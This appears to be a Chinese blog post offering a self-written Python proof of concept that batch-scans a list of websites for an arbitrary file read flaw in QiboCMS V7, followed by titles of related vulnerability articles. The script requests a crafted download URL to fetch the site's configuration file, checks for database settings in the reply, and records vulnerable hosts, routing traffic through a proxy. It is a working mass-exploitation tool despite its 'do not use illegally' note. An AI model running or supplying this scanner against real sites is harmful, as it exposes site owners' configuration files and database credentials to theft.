齐博CMSV7任意文件读取漏洞批量测试POC
注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。
# -*- coding:utf-8 -*-import requests
import re
import urllib
import base64
def dakai(filename):with open(filename,'r',encoding='utf-8') as fp:# url_list = []# for i in fp.readlines():# url_list.append(i.strip())# return url_listreturn [i.strip() for i in fp.readlines()] # 列表推到式def qibocms(url):new_url = url + '/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8'headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36'}try:respone = requests.get(url=new_url, headers=headers, timeout=4, proxies={'http': 'http://127.0.0.1:10809'})if 'ph<' in respone.headers['Content-Type'] and '$webdb' in respone.text and respone.status_code == 200:print("存在漏洞:" + new_url)with open('you.txt', 'a+') as fp:fp.write(url+'\n')except Exception as e:print(url + "err: " + str(e))if __name__ == '__main__':for i in dakai('url.txt'):qibocms(i)齐博CMSV7任意文件读取漏洞批量测试POC相关推荐
- Apache Solr任意文件读取漏洞复现
Apache Solr任意文件读取漏洞复现 一.简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口.用户可以通过http请求,向搜索引擎服务器提交一定格 ...
- 安全研究 | Jenkins 任意文件读取漏洞分析
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...
- 7天学习Go语言-尾声+一次险些翻车的任意文件读取漏洞小记
接口 接口的定义 接口(interface )类型是对其他类型行为的概括和抽象,接口类型定义了一组方法,但是不包括这些方法的具体实现 接口本质是一种指针类型,可以实现多态功能.如果一个类型实现了某个接 ...
- wsgiserver python 漏洞_新型任意文件读取漏洞的研究
0x00 前言 早前发现boooom在乌云上发了很多个任意文件读取的漏洞,都是形如 http://target/../../../../etc/passwd 这样.当时感觉很新奇,因为正常情况下,通常 ...
- CTFer成长之路之任意文件读取漏洞
任意文件读取漏洞CTF 任意文件读取漏洞 afr_1 题目描述: 暂无 docker-compose.yml version: '3.2'services:web:image: registry.cn ...
- php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复
修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...
- .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)
一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...
- gitlab 更新文件_GitLab任意文件读取漏洞公告
2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...
- phpcms前台注入导致任意文件读取漏洞
关于:phpcms前台注入导致任意文件读取漏洞的修复问题 简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...
最新文章
- 10个相似图片搜索以图找图的网站
- 电脑屏幕保护怎么取消_怎么监控员工电脑?老板如何知道员工上班在干什么?...
- Qt文档阅读笔记-单元测试中构建标准检测程序(CPU、Linux性能、内存泄漏等)
- windows 8.1 IE11 和 windows 10 Edge IE11 FlashPlayer 的安装与卸载
- 启动级别:init 0,1,2,3,4,5,6
- setfacl 权限导出_setfacl getfacl 将某个目录的访问权限赋值给某个用户
- 《一》Java EE
- ideagit更新一个文件_idea使用ssh下载的git代码怎么没法更新
- Linux Bootloader_转载
- 研发管理和项目管理有哪些痛点?
- Java垃圾回收机制知识点总结
- 通用技术和信息技术合格考知识点_通用技术学考复习_重要知识点汇总
- PyQt(Python+Qt)学习随笔:图例解释QFrame类的lineWidth、midLineWidth以及frameWidth属性
- Long memory is important: A test study on deep-learning based car-following model
- [Python从零到壹] 四十五.图像增强及运算篇之图像灰度非线性变换详解
- .py文件图标为白纸以及右键没有Edit with IDLE的解决办法
- D. Alex and Julian
- linux踢出硬盘,Linux MD/RAID 踢盘机制
- 报错Error: Returned values aren‘t valid, did it run Out of Gas?
- 判断网站是哪种数据库